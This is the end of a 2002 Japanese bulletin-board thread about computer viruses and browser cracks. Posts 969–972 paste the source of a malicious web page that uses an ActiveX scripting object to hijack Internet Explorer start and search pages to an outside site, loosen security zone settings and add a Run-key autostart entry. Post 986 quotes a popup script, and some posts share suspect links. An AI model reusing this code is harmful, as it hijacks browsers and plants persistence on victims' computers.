Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");


// Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01");
// Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01");
Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY");
// Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");

969 : :02/07/19 18:49
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\ie.search.msn.com","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\search.bisextop.com","http://www.idol-heaven.com/?id=martin");

970 : :02/07/19 18:50
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");

Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchURL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Local Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Bar","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchUrl","http://www.idol-heaven.com/?id=martin");
}

971 : :02/07/19 18:51
function f(){
try{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();


WinDir=Shl.ExpandEnvironmentStrings("%WINDIR%");
myFav=Shl.SpecialFolders("Favorites");
myDesk=Shl.SpecialFolders("Desktop");
myDesk2=Shl.SpecialFolders("Startup");

SetSrch()
putfav(myFav, myDesk, myDesk2);
//
//

filename = WinDir+"\\lives2.txt";
// filename = WinDir+"\\Live.exe";

regkey = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win388";
// WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
// InterfaceObject.setCLSID(WshShellClassID);

972 : :02/07/19 18:52
Shl.regwrite(regkey,filename);
//
//
//

}
catch(e){
return;
}
}

function init(){
setTimeout("f()", 1000);
}
init();


</SCRI-->
<!--ECT CLASSID ="CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC899" CODEBASE="redir.exe" </OBJE-->
</BODY></HTML>

973 :cheshire-cat ◆CATJR.v6 :02/07/19 19:01
実社会でも、「ボランティア」「奉仕」「手伝い」を他人に強要するヤシには、まともな人はいませぬ。

そゆのはあくまでも「任意・好意・善意もしくは気まぐれ」に基づく行動ですんで。

974 :名無しさん@お腹いっぱい。:02/07/19 19:18
恐らくウイルス入りと思われるリンク先真っ白なフラッシュ踏んじゃったんだけど、どうすればいいでしょう?


975 :名無しさん@お腹いっぱい。:02/07/19 19:22
>>974
ウィルスをだしにして他人の力を借りようとせずに、
本当にウィルスがあるのかないのか少なくともソースくらい読んで判断する。

976 :cheshire-cat ◆CATJR.v6 :02/07/19 19:23
>>974
ウイルスのスキャンをしたらどうっしょ。

977 :名無しさん@お腹いっぱい。:02/07/19 19:25
ボランティアだから… といって他人に同じ行動(思想)を要求する奴もウザイ。
極端な例が貧民救済募金やってる女子大生。

>>973 「道楽」という行動原理があったりする。

978 :cheshire-cat ◆CATJR.v6 :02/07/19 19:27
>>977
「道楽」、いいっすね。

979 :名無しさん@お腹いっぱい。:02/07/19 19:54
ウイルススキャンしても見つからない…
でも後ろのレスで「踏むな」とか2つ位ついてたからウイルスに間違いない…
どっかにIP表示されるくらいだったらいいんだけどなあ…

980 :名無しさん@お腹いっぱい。:02/07/19 21:15
>>977
青くせーこといってんなよ、な、カス。
こっちまで恥ずかしくなってくるだろ。

981 :名無しさん@お腹いっぱい。:02/07/19 21:59


39 名前:名無しさん@3周年 投稿日:02/07/19 20:25 ID:3Lnf+EfE
サッカー監督、世界ベスト100
http://dms100.org/worksucks

さっきこれ踏んだんですが大丈夫でしょうか?
うわさでは強力なウイルスって聞いたんだけど?

982 :通りすがりでムッと。:02/07/19 22:16
>>966
あってるよ。

962は「暇じゃねーんだよ ヴヲケ」と言ってるのに、
お前(963)は962に対して「書き込みする暇はあるんだな・・・」と言ってるんだろ。

962の発言は1分もあれば書けるが、回答は1行であっても時間はかかることを
965で俺は説明している。つまり、962の言ってること(暇がないこと)に矛盾はない
ことを代弁しているんだが、理解できないような文章だったか?

983 :名無しさん@お腹いっぱい。:02/07/19 22:22
>>982
オマエ、「いいたいことがよくわからん」ってよくいわれるだろ?
オマエのような馬鹿はROMってるだけのほうがいいぜ。


984 :名無しさん@お腹いっぱい。:02/07/19 22:36
Norton AntiVirus 2002のウイルス定義は毎日更新しており、XP標準のファイアウォールをオンにしているにも関わらず、
「ファイルへのアクセスが拒否されました」のメッセージが表示され駆除・ファイル復元出来ず、
繰り返し同種のウイルス「VBS.LoveLetter.A」に感染します。
とりあえず、オフラインに切り替えてから検疫した後、XPのシステム復元で対処している現状です。
問題点・対処法として考えられる事をお教え頂けませんでしょうか

985 :名無しさん@お腹いっぱい。:02/07/19 22:43
>>981
それどんなやつ?

986 ::02/07/19 22:52
>>985
<script>
function worksucks() {
window.open('1ame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
window.open('lame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
}
</script>
こういう奴。

987 :981はブラクラ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!:02/07/19 22:54
ウイルスもダウンロードされてくる。

988 :名無しさん@お腹いっぱい。:02/07/19 22:55
>>986
すみません。
初心者なものでよくわからないのですが
どんなウイルスがはいっているのですか?

989 :名無しさん@お腹いっぱい。:02/07/19 22:58
デンジャラス

990 :名無しさん@お腹いっぱい。:02/07/19 23:04
きゅーきゅーしゃ

991 ::02/07/19 23:09
>>987
どれがウイルス??
http://ime.nu/dms100.org/worksucks/hello.jpg
↑コレ?
http://ime.nu/dms100.org/worksucks/gay.jpg
↑コレ??
http://ime.nu/dms100.org/worksucks/gay.wav
↑ああ、コレか(w


992 :名無しさん@お腹いっぱい。:02/07/19 23:12
>>991
なんすか それ。

993 ::02/07/19 23:24
>>992
クリクして飛んでみ。
At your oun riskで(w


994 ::02/07/19 23:27
つか、
http空けてカキコしると、ピロシキ規制に引っかかるのか。。。。

995 :まじですか?:02/07/19 23:33
>>984
私も全く同じ環境で同じ現象になります。
同じように検疫して削除し続けてます。
今日ニュー速板に行く度に感染します。
ニュー速板がおかしいのか、私のPCがおかしいのか…。

996 ::02/07/19 23:39
>995
どっかにソースの染み付いて汚れてるんだよ。
着てる服良く見てみ。早く洗わないと落ちなくなるよ。


つか、感染ぢゃ無くて「検出」デショ・・・・


997 :まじですか?:02/07/19 23:48
>>996
洗濯の仕方を教えてください…
教えて君ですみませんが…

998 :名無しさん@お腹いっぱい。:02/07/19 23:52
すっぽんぽんなれや

999 ::02/07/19 23:57
>>997
そりゃチミ、熱いお湯で洗うがな。
それかソースの染み付いてるところ良く探し出してアボンしてもらうしか無いがな。

・・・そうそう、意外と絵とか模様書いてあるところは見落としがち・・・
「アボン」は洗剤ね。。。

1000 :  名無しさん@お腹いっぱい。:02/07/20 00:08
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

266 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)